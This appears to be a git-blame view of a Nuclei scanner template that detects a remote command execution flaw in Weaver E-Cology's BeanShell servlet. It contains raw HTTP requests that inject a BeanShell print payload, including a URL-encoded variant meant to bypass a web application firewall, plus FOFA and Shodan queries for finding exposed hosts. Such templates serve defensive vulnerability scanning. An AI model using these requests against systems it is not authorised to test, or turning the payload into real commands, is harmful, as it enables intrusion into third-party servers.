2023-09-14 19:11:38 +00:00
|
|
|
id: weaver-ecology-bshservlet-rce
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
|
info:
|
2023-09-14 19:11:38 +00:00
|
|
|
name: Weaver E-Cology BeanShell - Remote Command Execution
|
2023-08-18 03:22:06 +00:00
|
|
|
author: SleepingBag945
|
|
|
|
|
severity: critical
|
2023-09-14 19:11:38 +00:00
|
|
|
description: |
|
|
|
|
|
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
|
|
|
|
|
metadata:
|
|
|
|
|
fofa-query: app="泛微-协同办公OA"
|
2023-09-18 12:45:28 +00:00
|
|
|
max-request: 2
|
|
|
|
|
shodan-query: ecology_JSessionid
|
|
|
|
|
verified: true
|
2023-08-18 03:22:06 +00:00
|
|
|
tags: beanshell,rce,weaver
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
|
|
bsh.script=print%28%22{{randstr}}%22%29%3B
|
|
|
|
|
|
|
|
|
|
- | # bypass waf
|
|
|
|
|
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
|
|
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
2023-09-14 19:11:38 +00:00
|
|
|
- type: regex
|
|
|
|
|
regex:
|
2023-08-18 03:22:06 +00:00
|
|
|
- "BeanShell Test Servlet"
|
2023-09-14 19:11:38 +00:00
|
|
|
- "(?i)<pre>(\n.*){{randstr}}"
|
|
|
|
|
condition: and
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
2023-09-14 19:11:38 +00:00
|
|
|
- 200
|
